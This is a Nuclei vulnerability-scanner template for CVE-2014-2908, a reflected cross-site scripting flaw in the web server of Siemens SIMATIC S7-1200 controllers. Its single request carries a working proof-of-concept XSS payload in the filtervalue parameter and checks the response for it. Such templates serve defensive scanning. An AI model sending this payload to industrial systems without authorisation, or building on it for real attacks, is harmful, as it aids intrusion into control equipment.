my-nuclei-templates/CVE-2014-2908.yaml

40 lines
1.2 KiB
YAML

id: CVE-2014-2908
info:
name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference:
- https://www.exploit-db.com/exploits/44687
- https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2014-2908
- http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02
remediation: Upgrade to v4.0 or later.
classification:
cve-id: CVE-2014-2908
tags: cve,cve2014,xss,siemens
requests:
- method: GET
path:
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/02/23